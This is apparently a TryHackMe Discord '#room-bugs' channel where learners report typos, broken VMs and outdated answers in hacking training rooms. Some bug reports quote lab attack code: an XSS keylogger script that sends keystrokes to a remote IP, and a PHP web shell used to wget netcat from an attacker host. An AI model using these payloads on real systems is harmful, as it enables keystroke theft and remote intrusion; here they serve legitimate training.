#room-bugs

1 messages Β· Page 21 of 1

glass folio
#

I formulated my statement in a wrong way i guess.

oak mica
#

I think the screenshot highlights the whole command so it wasn't as obvious you mean the syntax

dusky junco
#

Nice catch thanks (: updated

glass folio
#

Np peepo_love

elder forge
#

I think in the active directory basics lab, it should be other objects instead of other OUs?

acoustic fjord
elder forge
#

oh ok sorry i didn't know that

twin tapir
#

Yeah no it’s literally other OUs

#

you can have OUs within other OUs

topaz thorn
#

Should be Task 7 instead of Task 6, as task 6 was a practical with Gobuster

#

Also each word here is spaced a lot here in Task 8

#

Same Task and same problem as above very spaced, not sure if it's intended to be typed out like that

dusky junco
#

Thanks @topaz thorn good catch -- resolved. Re. the text being spaced I can't seem to replicate it O.o

Looks okay to me -- nothing in the HTML code either mhhhhm

livid escarpBOT
#

Gave +1 Rep to @topaz thorn

urban moth
#

Hello everybody, I`m stuck on this question in Physical Security Intro room. And it looks like a bug.

wheat fractal
#

https://tryhackme.com/room/osqueryf8 Task 5: where the username is 3 characters long and ends with 'en' <- the question not match the answer, WHERE length(username) = 3 AND username like ...

zealous vortex
#

Typo in thew new osquery room, task 1 "AlienTvault" (the T)

timber pine
#

there is a small error/typo in the new walkthrough room osqueryf8 in task6 http://127.0.0.1:8080 should be https i think =)

gleaming shadow
stuck stirrup
stuck stirrup
wheat fractal
#

Hello, I am doing the MITRE room on task6, the link to APT29 appear to be broken (404).

stuck stirrup
# wheat fractal Hello, I am doing the MITRE room on task6, the link to APT29 appear to be broken...
GitHub

An open library of adversary emulation plans designed to empower organizations to test their defenses based on real-world TTPs. - center-for-threat-informed-defense/adversary_emulation_library

wheat fractal
#

Thanks a lot!

stuck stirrup
#

No problem. The url was updated fingergunz

young pine
#

In the "RootMe" room on Task 2 the last question is "What is the hidden directory", and I found one and was able to upload a reverse shell. It keeps telling me that my answer is incorrect though.... Is this a bug??

#

oh forget it, it wanted the answer in another format...

zealous gyro
#

Can I write a suggestion?

obsidian kiln
zealous gyro
#

done thank you

coral shell
#

there is bug on room DIFFRENT CTF it's can be rooted in one minute..

eternal summit
#

Is it the overlayfs exploit?

obsidian kiln
#

Because if so that affects virtually everything

eternal summit
#

(but also we have a temporary patch)

coral shell
obsidian kiln
#

AWS will hopefully release an updated kernel soon. Until then, we have a force patch

coral shell
#

noted

timber pine
#

could it be that the password for the new room is expired ?

timber pine
#

no WindowsCTF

topaz thorn
#

Ohh

timber pine
#

i actually guessed the "correct" one for the thm interface

#

and if i try it on smb or rdp it gives password expired

#

ssh does not give much of a feedback even in verbose

topaz thorn
#

Yea I think I may know why, I just pinged one of the admins

karmic wing
#

Hi guys, following the instructions on Task 7 of XSS Playground seems to crash the server.
I don't know enough to even start suggesting why, but the code I tried is:
<script type="text/javascript">
let l = ""; // Variable to store key-strokes in
document.onkeypress = function (e) { // Event to listen for key presses
l += e.key; // If user types, log it to the l variable
document.querySelector('#cont').innerHTML='<img src="10.10.188.92/log/' + l + '">'; // update this line to post to your own server
}
</script><div id="cont"></div>

jolly kindle
#

WebOSINT room, last question of Task 2: "What country is listed for the registrant?". The answer should be Iceland, not Panama anymore.

urban moth
#

Hi, just trying to complete CC: Pen Testing room but it does not accept my answer

rustic nebula
urban moth
#

This worked for me

#

Double quotes didn't work

rustic nebula
#

idk i think it doesnt matter , i did all of them double quotes

rustic nebula
#

Bug bug room bug or maybe not.

#

i was doing tony the tiger and i couldnt find port 8080 open

#

but it asks for whats running on 8080

#

i tried restarting the box still it shows that its closed

#

ahh its java nvm

eternal summit
#

It takes forever to boot, yeah

thin pulsar
#

What happens to the forensic rooms.its shows no room

#

It not shows any rooms

eternal summit
#

That's a known bug, the site devs are looking into it at the moment

slender urchin
#

Splunk Task 2 - Splunk forum location still not updated and since it appears to have been requested multiple times: <not-questions-but>.splunk.com ---- hint for anyone digging like me stuck on an outdated question without any hint as a roadblock to actually getting to course content.

slender urchin
#

Directed to report a Literature bug on:
/room/bpsplunk:
Task 2 Can you dig it?

Answer Format: ******```
The word 'rename' should likely replaced with a more accurate word like 'locate' to avoid confusion. Thank you!
rustic snow
#

Room Link : https://tryhackme.com/room/attacktivedirectory
Room Name : Attacktive Directory
Task 6a : Using utility can we map remote SMB shares?
Hint : man tool_name will tell you a little bit about the tool!
Answer : it is a tool name

But look at the question now it didn't ask for the tool name
Question would've been
Which utility can we use to map remote SMB shares.

viral cobalt
royal pine
#

Hello, I'm currently doing the "Linux PrivEsc" room and I think that the validation of the field in question 3.1 (root flag)
has a problem.

I have the right flag, after checking the write-ups because I have questioned myself, is the problem known? I have the flag if a
moderator wants to check.

wheat fractal
#

Hello I am trying to do the Isac room task 8, but the password is not accepted for the RDP

thin pulsar
#

the forensics rooms bug is not fixed.it still make troubles

eternal summit
#

?

wheat fractal
#

anyone else having major problems connecting to anthem? RDP freezes pretty fast after successful login, connections via tools like winexec drop or timeout. Checked internet speed, 80 mbps should not be the problem. VPN is active

#

I am using remmina with kali attackbox, if it should work i will try from windows via vpn

#

other THM machines work flawlessly, stable and fast connection via RDP (rdesktop). Just anthem is slow as hell

harsh nimbus
#

Hi, just completed Yara, the sixth question in Task 11 doesn't accept what I think should be the correct details as per Valhalla. Really minor thing but maybe worth a look?

glad badger
zealous vortex
#

Tim- someone was asking for more power in the other channel earlier. Was SO tempted to ping you.

glad badger
livid escarpBOT
#

Gave +1 Rep to @harsh nimbus

wheat fractal
#

heyy, is it possible that Physical Security Intro room does not accept correct answer?

oak mica
#

if you want some hints I can provide some better ones if you ask in room hints

wheat fractal
livid escarpBOT
#

Gave +1 Rep to @oak mica

oak mica
wheat fractal
#

Yes, they are not obvious/easy, definitely πŸ™‚

tall nexus
#

broken image on task 5 (under domain policies overview) in throwback room

wheat fractal
#

This answer should be right if I am not wrong. MIRTE room; task 6 ; question 3;

Examining APT29, what 2 tools were used to execute the first scenario?

#

answer: Pupy and Meterpreter

wary yew
#

Answer is correct @wheat fractal

wheat fractal
#

doesn't seem to work..

wary yew
wheat fractal
#

ahw damm

glad badger
wheat fractal
#

oh damm

#

for real πŸ˜‚

vital vortex
#

So I'm not sure if this is the right place to report it as it is not a room bug per-say but yesterday i got done with the Mr Robot CTF (https://tryhackme.com/room/mrrobot) and I had to use the walkthrough as I'm still quite new at this whole thing. Anyway, there's a point in that challenge where one has to decrypt a raw md5 hash of password. The video walkthrough uses this .dic file that is provided by the room as the wordlist. However. That list does not contain the un-hashed password. Crack station or similar sites will have it but the walkthrough explicitly shows a command that uses John the ripper, something like john hash.md5 wordlist=<file>.dic which will NOT work. Did I miss something or is it just a bit missleading?

zealous vortex
#

That's more a bug in the walkthrough than the room itself. Perhaps the room changed after it was written. Generally, the writeups are made by people other than the room creator

vital vortex
#

I believe in this case it was the author of the room, DarkSec. But I would agree, the issue i had is with the walkthrough, not the room.

eternal summit
#

The room is unlikely to have changed

upbeat kiln
#

On the room "Network Services" at Task 9 on enumerating the FTP, the first question How many ports are open on the target machine?. The answer appears to be 2 while doing an Nmap shows only 1 port open

woven pawn
#

Should be they're not their

cedar grail
woven pawn
#

Edited! coolguy

cedar grail
deft token
#

I was doing the owaspjuiceshop room In task-4 Q1: I am not able to get the answer. it is not showing up. can someone have a look?

glad badger
glad badger
livid escarpBOT
#

Gave +1 Rep to @woven pawn

cedar grail
woven pawn
#

thanks @cedar grail

livid escarpBOT
#

Gave +1 Rep to @cedar grail

cedar grail
cedar grail
upbeat kiln
cunning berry
#

Hi, I don't if it's a bug or the steps to escalate privilege has changed

#

This is regarding task 18 - Accumulate of room Advent of Cyber 1 [2019]

#

I was going for the 3rd question.
Elevate privileges and read the content of root.txt
after banging my head for 1 hour, trying to understand how to go about it, I finally decided to give up and looked for a writeup

#

the writeup says that we have to search in the google chrome history, but to my surprise, when I logged into the machine, google chrome was not even installed.

#

I terminated and started the machine again, and still the same issue.

#

Is this a bug, or the process for this sub task has been changed?

eternal summit
#

It was replaced with Blaster

#

Which is a slightly modified version of the box which makes the vuln even easier to exploit

cunning berry
#

Blaster?

eternal summit
#

A different THM room

#

It was originally Retro

cunning berry
#

it was still retro

#

I am talking about the room Advent of Cyber 1 [2019]

eternal summit
#

They're 99% the same

marsh plinth
#

so im on windows priv esc and im on task 3, when i try "net start daclsvc" it throws a error
"Invalid command: net start
"
then a usage manual

little hull
#

In Blaster https://tryhackme.com/room/blaster there's similar bug.
Task 3, question 1. It says to look into the browser history to find out which CVE was researched on this computer. When I've looked up the history, there was nothing like that. In the end I have checked the walkthrough, and there, in the browser history was a record of a CVE search

lime yarrow
#

hi. Went back to finalize the Enterprise room, but now it tells me that the user password has expired. I am pretty sure this is not by purpose as it worked the last time I worked on the room.

light herald
#

Room network services 2 Task 6.
The msf module does not working on msf6 but does work on version 5.
Seclists package is not included in attack machines and can't be installed.

eternal summit
#

Seclists is already on the attack box, just a slightly different path

viral cobalt
lime yarrow
viral cobalt
#

interesting. I'll look into it later today. Thanks for reporting

lime yarrow
#

thanks.

viral cobalt
#

@dusky junco @lucid oasis if either of you are available, would it be possible for you to clone a running instance to my account?

#

IP is 10.10.160.91 machine title is Enterprise v1, new machine title will be Enterprise v2, save to: Sq00ky

lucid oasis
#

Ping me again when you reply - otherwise I'll miss it

viral cobalt
#

I'm on VIP -- but I know the machine needed a resource bump to begin w/

lucid oasis
viral cobalt
lucid oasis
#

nice - cloning with 30

lucid oasis
viral cobalt
#

awesome, thank you! ❀️

lime yarrow
#

was the enterprise room problem fixed?

viral cobalt
lime yarrow
#

yes works.

#

quite slow startup so initially I thought the passwords etc were changed

viral cobalt
#

gotta love Windows

lime yarrow
#

working on privEsc now

viral cobalt
#

ping me if you encounter any other issues

#

it should be smooth sailing from there

lime yarrow
#

yeah worked. just finished

wheat fractal
#

intro2windows task 3 spelling error 3rd question assings > assigns

glad badger
livid escarpBOT
#

Gave +1 Rep to @hallow depot

light harbor
#

In "Hacking with powershell" a "wrong" answer is accepted.
I missed a "t" in Installer and it accepted.

vast cypress
light harbor
livid escarpBOT
#

Gave +1 Rep to @vast cypress

ruby swift
nova saddle
#

Looking for help. In the Authenticate room, Dictionary attack section I'm not getting any results for Jack's password through Burp OR Hydra. I've looked at both the walkthroughs and I'm doing everything right, I'm just not getting any results. Anyone have any ideas?

lofty canopy
#

I'm calling this a bug as I cannot find any information or solution as to why this problem is happening. On the Burp Suite room I am supposed to capture a response with the "Set-cookie" heading. For two days now, no matter what I do on the web page (from just browsing to creating and logging into an account all the way to "buying" something) I cannot get the set-cookie flag. Some other things I have tried; allowing third party cookies in firefox, refreshing multiple times with both the refresh and ctrl f5, disabling ublock and privacy badger, using the filter option to make sure I just wasn't missing it.

eternal summit
#

Are you seeing requests with Cookie?

lofty canopy
#

yea lots, I see cookie and cookieconsent but no responses

eternal summit
raven linden
#

Hi. I have a weird problem in the "Tutorial" room. If I press the "Join room" button, I get redirected to the "How to use TryHackMe" room, which I have completed earlier. (Of course there is no real reason to do the "Tutorial" room for me, but it would be nice to complete it to get rid of it being at the top of Hacktivities sorted by "Most popular")

fluid jolt
#

I think I found an error with the flag provided for OWASP Juice Shop / Task 5 / Question 3 | The flag appears to be incorrect even after visiting the scoreboard page and re-prompting the toast notification

civic brook
#

John the Ripper is showing ssh2john as python3 script, I don't think it has been updated to that yet

#

or may just want to make a note that older script is python2

velvet totem
#

Hi, not sure if this is a bug, but i just joined room OhSINT and i am trying to download the picture on this room, but seems that its just jpg should it be like that ?
shouldn't it be like picture.jpg ? or its a catch ?

velvet totem
#

nvm

wary yew
#

Not sure if this qualifies as a bug
Volatility room: downloading with apt-get install volatility as suggested on a kali machine outputs an error: Unable to locate package volatility
Downloaded from https://www.volatilityfoundation.org instead.

mighty kayak
#

Enumerating FTP room the machine for that isn't populating an IP: IP Address Shown in 00s

#

I've restarted it like 6 times so far

eternal summit
#

It's a site issue

mighty kayak
#

πŸ’”

tranquil needle
#

How long is it gonna take to fix this ip thing?

eternal summit
#

No one could possibly know

mighty kayak
#

It was working like two days ago so I hope it will be back up soon.

dusky junco
#

A fix is being pushed as we speak ((: just need to wait for it to roll out to all the servers

mighty kayak
#

πŸ˜€

cold harbor
#

hello, room: https://tryhackme.com/room/rpmetasploit
I can't go further at the end because the command is not working.. 😦 I saw the video for help but for me its not working...
"Additionally, we can start a socks5 proxy server out of this session. Background our current meterpreter session and run the command search server/socks5. What is the full path to the socks5 auxiliary module?"

meterpreter > bg
[*] Backgrounding session 1...
msf6 exploit(windows/http/icecast_header) > search server/socks5
[-] No results from search
msf6 exploit(windows/http/icecast_header) > search server/socks4
[-] No results from search
msf6 exploit(windows/http/icecast_header) > search server/socks5
[-] No results from search
msf6 exploit(windows/http/icecast_header) >

#

does anyone can help me with this?

still lava
#

just search for socks5

#

auxiliary/server/socks5 is the path answer

cold harbor
#

thanks but I cannot understand why the search is not find anyting

still lava
# cold harbor thanks but I cannot understand why the search is not find anyting

I just took a look, its been a long time since I did this room, the basic answer is its not finding it because there isn't anything called socks5 in there! Maybe it was renamed? If you search on /auxiliary/server you'll see everything on that paths. There is SOCKS, but no socks5, so this is why. I guess the question needs editing, perhaps this is a change in msf6

zealous vortex
#

That room is a little outdated. The modules have changed names

cold harbor
#

I see thank you!

zealous vortex
#

you're welcome

wet vector
#

Hi guys, I need help. I have successfully completed all questions under except one in the room of OWASP Juice Shop.

Question found in Task 5: AH! Don't look!
Question #2: Log into MC SafeSearch's account!
Answer I found: b03f4b0ba8b458fa0acdc02cdb953bc8

I have successfully hashed the password. But it doesn't accept my answer when i click on submit.
Please assist.

civic brook
#

@eternal summit the flag filename and what you have in the question are not the same for the OverlayFS room

civic brook
lofty canopy
#

OWASP Juice Shop room, I can't seem to get the flag to generate after accessing the admin account like it said I should.

#

Okay so this is weird. I opened two browsers; one is firefox where I am on the juice shop site and capturing with BurpSuite. The other is LibreWolf where I have the tryhackme page up. I tried bringing up JuiceShop in LibreWolf. I then moved on to accessing benders account. I accessed the account on the firefox browser but got the flag on the librewolf browser.

#

No matter what I try it simply won't give me the flag for logging into the admin's account. I'm really not sure what I'm supposed to do here

wheat fractal
#

repost from #site-bugs :
I guess the issue already been reported but I really want to do this room so I wanted to report that the "learn Rust" room isn't loading

eternal summit
#

Not really a room bug, as it's a site bug like I said.

wheat fractal
#

Hey! Not really a bug, but maybe an oversight. In Linux part 3 in task 7 we should make a directory and file, but they are already there. Also, what happen to the tiny hacking task at the end of Linux 'path'?

zealous vortex
worn kelp
#

guys the room splunk has bug, when i open firefox and put ip:8000 to see the webserver it say no connection

civic brook
#

are you on the deployed machine

worn kelp
#

@civic brook yes and i run the box

eternal summit
#

The IP of the attackbox, or of the deployed machine?

wary yew
#

Room: Investigating Windows. Question: 10

viral cobalt
wary yew
#

The answer formats. One says one thing, the other another

distant zephyr
#

In burpsuite room task 6 which web application hosted on VM its talking about to complete the task?

eternal summit
#

The one that you deploy in the room with the button that says "Start Machine"

#

The IP will be shown under Active Machine Information

lofty canopy
dusty zodiac
#

I believe this may be a typo in the "Attacking Kerberos" room

eternal summit
#

Why do you believe that?

#

You sure you're not going between two domain admins?

dusty zodiac
#

That makes sense. Maybe it could say something like "from a domain admin to another domain admin" to clarify. Just a thought

obsidian kiln
#

It rarely ends well

twin tapir
eternal summit
#

That's... what you said above?

twin tapir
#

Exactly

eternal summit
#

Is it not between two different DAs?

twin tapir
#

Nope

eternal summit
#

So it's between the same DA?

obsidian kiln
#

Go fix

viral cobalt
#

moving horizontally from one domain admin to another

obsidian kiln
#

See, that makes sense

#

Moving from one domain admin to the same domain admin, does not

dusty zodiac
#

That would be one heck of an exploit to be able to do that haha

eternal summit
twin tapir
obsidian kiln
dusty zodiac
#

Haha maybe I shouldn't have mentioned it πŸ˜…

zealous vortex
#

Muiri vs Cry, mortal kombat style.

obsidian kiln
zealous vortex
#

🍿

#

I just wanna see finishing moves, tbh

lofty canopy
queen hedge
#

The hacking with powershell room does not give the option to open a windows machine only linux which is useless. Anyone else have that problem?

harsh nimbus
#

Hey, Windowseventlogs Task 2, Question 2 needs a tweak, can I DM THM staff please? My mistake

eternal summit
#

Please just report the issue here

harsh nimbus
#

Essentially the answer accepted is NOT the first event

harsh nimbus
viral cobalt
#

you're fine dude, don't sweat it

tired thorn
#

hi guys

#

I think the MAL: Malware Introductory VM is bugged

#

I cant connect to it

#

I've been waiting more than 10 min. and it doesn't received ICMP packets

#

neither RDP conection

wary yew
#

have you tried without giving it a domain?

tired thorn
#

Ok now it launched

#

sorry

#

13 min. later but I got it

#

sorry if I bother you 😦

wary yew
#

It could still be a bug, though πŸ˜„

#

The instructions do show the ANALYSIS-PC as domain, but it does not work with it. It only works without it

clever mauve
#

Remote Tryhackme ? Whats that?

wary yew
#

huh. It didn't work for me

eternal summit
#

Try SSH instead

raven linden
surreal steeple
#

Hello! Just wanted to notify whoever handles content updates that the MITRE room, Task 7 last question uses ATT&CK Framework v8.2, which is no longer live as of April 28th. Current version is v9

wheat fractal
#

adventofcyber2 task 11 answerable question 1
not sure if its a bug but the answer format does not match the actual answer

question is "What vulnerability type was used to exploit the application?"
also cant show picture because I already submitted the answer but im completely sure the answer format does not have = * to the actual answer

lethal dagger
#

Lots of rooms need the update by forking perhaps?

#

*Old rooms vulnerable for the CVE-2021-3156 Baron Samedit

#

I just root one

eternal summit
#

It's a lot of work to go back and patch rooms, you either need to patch and reupload, or get the admins to spin up an instance with internet access.
I don't see how forking factors into it.
Unless THM paid the creator for it, the creator retains all their rights to the content.

lethal dagger
eternal summit
#

You're only really cheating yourself.

lethal dagger
#

than i decide to try something new

eternal summit
#

There's quite a few rooms with unintendeds, whether they've existed since release or a CVE in the kernel or Sudo.

lilac viper
#

Room was deleted, but still the manage link is working
why ?

lethal dagger
eternal summit
#

Unless they mean a room they created, which seems likely given /manage/

lilac viper
#

its a created room

eternal summit
lilac viper
#

I tried deleting the material, then it showed it as attached to a task
The room was still there on the old link

eternal summit
#

Again. Probably a site bug.

glad badger
grim harness
#

https://tryhackme.com/room/intro2windows

Super silly perhaps, but:

"Windows comes equipped with two command-line tools:

  • CMD
  • Powershell
  • Windows Terminal"

Emphasis is mine. I think Windows indeed comes with CMD and Powershell; Windows Terminal is open source project by Microsoft, but I don't think it comes equiped with every install.

#

I think it's great to include that, but then the 'two' should be 'three' πŸ™‚

glad badger
livid escarpBOT
#

Gave +1 Rep to @grim harness

frank creek
soft terrace
#

room: https://tryhackme.com/room/eritsecurusi - task 5 - typo
we create c.php but after creating we're using cmd.php which can't be found.
creation: echo '<?php system($_GET["c"]);?>'>c.php
using file: http://serverip/files/cmd.php?c=wget http://yourip:8000/nc

wheat fractal
# glad badger What's the answer you had in mind?

Answer I had in mind was a 4 word answer, answering format is 3 words, answer that was correct for me was ||stored cross-site scripting||. Also for the following question in the same task it says "how many xss alerts are in the scan" and answer is ||2|| . But I'm sure I got 9-10 total XSS alerts from the scan, possibly could be worded wrong. 2 of them were post requests and the rest were get requests, so maybe the question should be changed to "How many post xss alerts are in the scan" or something like that

fathom steeple
wheat fractal
livid escarpBOT
#

Gave +1 Rep to @hallow depot

wheat fractal
#

np

#

um i got Security Groups Wrong but got ecurity Groups correct.

sonic willow
#

if you refresh the page, the right answer will show

#

it's designed to be a little lenient, to account for spelling errors and such

obsidian kiln
#

@worthy pasture you haven't deployed it by the sounds of things.

#

There should be a box at the top of the page displaying the IP if you clicked the big green "Start Machine" button in the first task

craggy agate
#

Hi, page two of the "Learn Rust" room does not load for me.

craggy agate
#

Narf, I closed the tab while I was waiting on something to happen on page two and now I cannot access the room at all. It's loading endlessly πŸ˜„

copper nova
#

Hello Everyone! New here. Going through Linux Fundamentals Part 2 (https://tryhackme.com/room/linux2#). Currently at Task 3. Seems like I can not do SSH or even ping the machine. Have tried to start machine and terminate it multiple times. No other machines are running. Is this a known issue or I'm doing something wrong? Thanks in advance!

craggy agate
copper nova
#

attackbox

craggy agate
#

I just finished linux2 and it worked without an issue. Please doube check you have no other VMs running by going through the other rooms: https://tryhackme.com/rooms and then also make sure you're using the correct IP to connect to.

copper nova
#

Yes, confirming, it was my issue. It works fine now. Thanks @craggy agate !

livid escarpBOT
#

Gave +1 Rep to @craggy agate

worthy pasture
obsidian kiln
#

Well fixed! πŸ™‚

grim harness
#

Again a really small one: https://tryhackme.com/room/activedirectorybasics there's a sentence that really ought to be 2 sentences:

"The type of trusts put in place determines how the domains and trees in a forest are able to communicate and send data to and from each other when attacking an Active Directory environment you can sometimes abuse these trusts in order to move laterally throughout the network."

There should be a period after 'each other' and a capital When.

"The type of trusts put in place determines how the domains and trees in a forest are able to communicate and send data to and from each other. When attacking an Active Directory environment you can sometimes abuse these trusts in order to move laterally throughout the network."

versed jewel
#

where is room - help

#

am I get kicked ??

eternal summit
#

No, you have not been

versed jewel
#

ok I can't see it anymore

zealous vortex
#

did the "support" section get collapsed/some channels got hidden?

topaz thorn
wheat fractal
#

so this is impossible because scylla.sh got taken down and moved to scylla.so but scylla.so isnt functional as of rn, this is Advent of Cyber 2 task 19 day 14

rustic nebula
wheat fractal
viral cobalt
#

we love relying on external resources lol

rustic nebula
elder forge
#

In the Lian_Yu room the vid is no longer there

twilit lake
#

Can I pm any admin regarding the broker room? I think there might be an unintended way to privilege escalate to root.

wary yew
#

Is the ISO27001 room being reviewed for grammar mistakes? I checked the channel and they mention quite some errors but they haven't been changed as of yet (dated Feb/Mar)

eternal summit
teal barn
#

https://tryhackme.com/room/mrrobot
pages like ||/robots|| are delivered instantly but pages like ||/wp-login|| take about 3 min to be delivered, it's so long that I thought that it was a rabit hole with an intended timeout. The box have been launched an hour ago so it's not like the service have no tarted yet.

#

Oh, I think it was probably my ffuf that was DoSing the php server, the VM is not very resilient and very resources limited.

eternal summit
#

Wordpress is slow.

#

As a general rule.

teal barn
#

I stopped my ffuf but the VM is still slow 😦

#

That will be painful as some BF is intended.

ruby swift
ruby swift
livid crane
#

@obsidian kiln

dusky junco
#

afaik the results the same if you were to put "fuelcms" but I'm just checking now ((: if it doesn't I'll update

#

mhh yeah seems to give different results -- I'll put both suggestions i.e. searchsploit fuelcms & searchsploit fuel cms

sonic willow
#

i swear searchsploit updated their search to be more regexy and find exploits easier

viral cobalt
glad badger
livid escarpBOT
#

Gave +1 Rep to @ruby swift

compact shoal
#

Wrong video for the room dogcat

soft iron
#

Hello, I belive there is a mistake in the vulneversity room

#

shouldnt it say Go to payload, select the extension files we just created

#

then go to "position", select Sniper mode and ....

#

maybe its my Burp version but in mine Payload is to select the file and position to select the mode and the selected word to fuzz

livid crane
livid escarpBOT
#

Gave +1 Rep to @dusky junco

wheat fractal
#

Adventofcyber2 day 24/last day "- - Download build-alpine on your local machine via the git repository" git repository links to - - https://github.com/lxd-images/alpine-3-7-apache-php5-6 instead of https://github.com/saghul/lxd-alpine-builder although it isnt needed to answer the questions since the machine already has an lxc image container on it

GitHub

LXD Image: Alpine 3.7 (Apache, PHP5.6). Contribute to lxd-images/alpine-3-7-apache-php5-6 development by creating an account on GitHub.

GitHub

Build Alpine Linux images for LXD. Contribute to saghul/lxd-alpine-builder development by creating an account on GitHub.

wheat fractal
#

Hey, not really a bug, but in Burp room there is a link to other room which is not available anymore ('Owner has made this room private'). Task 9

zealous vortex
#

Typo/poor wording in room commonlinuxprivesc, task 6: "...write access to the /etc/passwd must only limit for the superuser/root account." This should probably be something more like "write access ... should only be allowed for the ...root account"

craggy agate
lunar flicker
#

owasptop10 room is paid now ?

coral shadow
hollow sorrel
#

In the Corp room it takes ages to type into powershell, compared to cmd

#

This problem persists even while starting powershell as cmd's child process

hollow sorrel
#

To add on to its slowness, the administrator password is expired and requires to be changed upon logon, which is a very lengthy task looking at its high complexity

raven linden
#

A very minor bug (?) in the "Linux Strength Training" room. The last question in the "Working with files" only works if the moved file is in the current directory, while the instructions ask for it to be put in the same directory as the script. (E.g. if the file is moved to the directory, but then the script is run with ~/xxx/yyy/zzz.sh it fails with "... not in this directory, please move it to here" as the script checks the current directory (with test -f "$FILE")

trail bramble
#

https://tryhackme.com/room/webenumerationv2

Room: Web Enumeration
Task 4: 1.1. Gobuster Modes

  • Using "dns" Mode

gobuster dns -d http://mydomain.thm ...
is wrong. You don't need http:// when dns mode.

correct:
gobuster dns -d mydomain.thm ...

strong kelp
zealous vortex
#

That looks like an interesting room. Judging by the creator's profile, I'm going to guess he/she isn't active enough to fix that. I don't know who/how that gets handled

lime yarrow
#

I think there is a minor error in the new tshark room

eternal summit
#

?

lime yarrow
#

the final 2 questions.

#

If you filter the DNS outout two of the letters in the result are swapped

eternal summit
#

Worked when I submitted it

lime yarrow
#

yeah except when you put it through cyberchef the flag is not 100% correct.

#

the tolerance lets it go in

#

the B and Q next to each other in the string

raven linden
strange crow
#

there is an issue with task11.6 of Yara ROOM any maintainer of this room here ?

#

it seems that the highest rule match per month moved recently πŸ˜„

#

the old answer is no more true πŸ˜„

#

@hazy hinge & @dusky junco that's probably for you ...

glad badger
glad badger
glad badger
glad badger
eternal summit
obsidian kiln
#

(It's also a 3AM mistake. Fixing it)

#

Fixed. Thanks for reporting @coral shadow πŸ™‚

livid escarpBOT
#

Gave +1 Rep to @coral shadow

zealous vortex
#

Muiri, you should make it clear at the top of each room that you created it. So I can read the text in a Scottish voice. πŸ™‚

glad badger
livid escarpBOT
#

Gave +1 Rep to @trail bramble

glad badger
zealous vortex
#

hey Tim, while you're here

#

I'd be willing to volunteer some time to fix some of the easier/"low hanging fruit" type stuff

#

not sure how useful that would be, but πŸ€·β€β™‚οΈ

glad badger
glad badger
zealous vortex
#

I also meant from a room creator/editor perspective. Not sure what your backlog of issues looks like or what it takes to resolve them

glad badger
#

New rooms go through a room testing phase, which is handled by the marvelous room testing team. Issues for released rooms get fixed on a reported basis; mostly from reports in this channel, but also based on other room metrics that we gather. Periodically room content gets reevaluated and redone. πŸ™‚

#

We really appreciate all the reports we get daily from users. I think it is vital to have that type of feedback from our users. User feedback is a vital part of Content Quality. πŸ™‚ β™₯️

sonic willow
#

and a good qa tester πŸ˜‰

zealous vortex
#

Bah, who needs testing, just ship the beta and let the users do the testing πŸ˜‰

#

(no, I'm not really a product manager)

glad badger
#

See, my metric matrix can show 99.8 score for all rooms, but that number means very little if user feedback says otherwise. πŸ˜„

#

It probably would mean I would be gathering the wrong metrics. πŸ˜‰

zealous vortex
#

They say you can only optimize for what you track, and most people track the wrong things πŸ€·β€β™‚οΈ . Not trying to be snarky, just a common software engineering axiom. I think this place is great (obviously)

glad badger
#

That's very true. That's why Agile is more useful (to some extent) as it is user-stories based. But if you have user-stories that don't align with what the customer wants, you're still dead in the water. hehehe

zealous vortex
#

very true

#

I think every software dev has learned that lesson a few times

glad badger
#

Probably one of the more honest books on Agile (iterative) development (and quality) is: Clean Agile: Back to Basics by Robert C. Martin. I highly recommend it before reading any other Agile book. πŸ™‚

zealous vortex
#

I've read that, actually, but it's been quite a while. I think I've read a couple other books from him too

glad badger
#

My favorite is: Reasonable expectations: QA Should Find Nothing hahaha

zealous vortex
#

lol. Should, perhaps. I've never, EVER seen that happen in reality

wheat fractal
glad badger
#

When you refresh the page, does it show /room/learnburp? Because that is what I am seeing. @wheat fractal

wheat fractal
#

I am subscriber, if it makes any difference.

glad badger
#

Aah, now I see what you mean. Yeah, the room learnburp has been set to private. I will inquire why that is with the room creator. Thanks for reporting. πŸ™‚ @wheat fractal

livid escarpBOT
#

Gave +1 Rep to @torn bluff

livid escarpBOT
#

Gave +1 Rep to @glad badger

craggy agate
livid escarpBOT
#

Gave +1 Rep to @glad badger

lunar flicker
# glad badger It's a free room. πŸ™‚

Don't know why I was getting you Have to be subscribed to spawn this machine. I logged out & logged in again then everything was fine don't know what happened thereπŸ€·β€β™‚οΈ

wheat fractal
#

Hi guys in the OWASP top 10 room in task 7 I succesfully logged in as darren and see the flag. It only doesn't allow me to copy the flag which means I have to type to whole flag manually. I could also just be making a mistake but who knows.

wheat fractal
#

yeah

rustic nebula
#

you can view page source and copy

wheat fractal
#

already just typed it over but that would indeed be easier xd

hazy hinge
livid escarpBOT
#

Gave +1 Rep to @strange crow

chilly roost
#

Hi, not exactly a bug - just an update to msf causing some issues for user's running their own vms. "Learn to use Metasploit" room, Task 7 , Q 2, due to msf changes from 20th Jan: "PR 14566 - Removed the auxiliary/server/socks4a and auxiliary/server/socks5 modules from Metasploit. Their functionality is now combined into a single module, auxiliary/server/socks_proxy, to prevent code duplication." - providing the correct answer is not possible when not running attackbox.

zealous vortex
#

The room is just a little outdated at this point, but I was able to figure out the answer from the format hint, so it doesn't completely break the room.

waxen grail
#

Hi everyone! I think there may be an issue with the https://tryhackme.com/room/networkservices room. For task 9 on Enumerating FTP, the attached target machine does not appear to have all expected ports open. Writeups I've seen state that it should have tcp/21 and tcp/80 open. I've opened the machine a couple times, and can only ever see tcp/21. This causes an issue with the first question since it's asking for the number of open ports.

eternal summit
#

It takes forever to start that service

waxen grail
#

Ahh I see. Thanks for the heads up! I double checked since I still had the machine running. Looks like it's there now. Just need to be a bit more patient πŸ˜…

eternal summit
#

It takes time to start up fully

coral shell
#

oh sorry

coral shell
eternal summit
#

Ok.

soft ice
#

I tried starting the machine for tomghost(free room) and it said "You need to be subscribed to start this machine"

#

After refreshing the page, it worked tho.

eternal summit
#

I've seen this cropping up a few times, perhaps worth investigating cc @dusky junco

#

Not just this room

cunning berry
#

Hi, I am facing a problem in Task 7. Juice Shop

#

Question 2

#

I did the persistent XSS but it's not giving me the flag.

#

@eternal summit

eternal summit
#

Please don't just ping me because you want help. Everyone here is a volunteer.

cunning berry
#

ooh okay, I did not know that, I am sorry.

#

It's a bug, I already solved it, I don't think room-help would be able to help me

#

But anyways I'll try.

eternal summit
#

Ok then report it here. No reason to ping me here tho.

cunning berry
#

I said I am sorry, will take from next time

warped ridge
#

required "Rubeus" doesnt run on kali :v

#

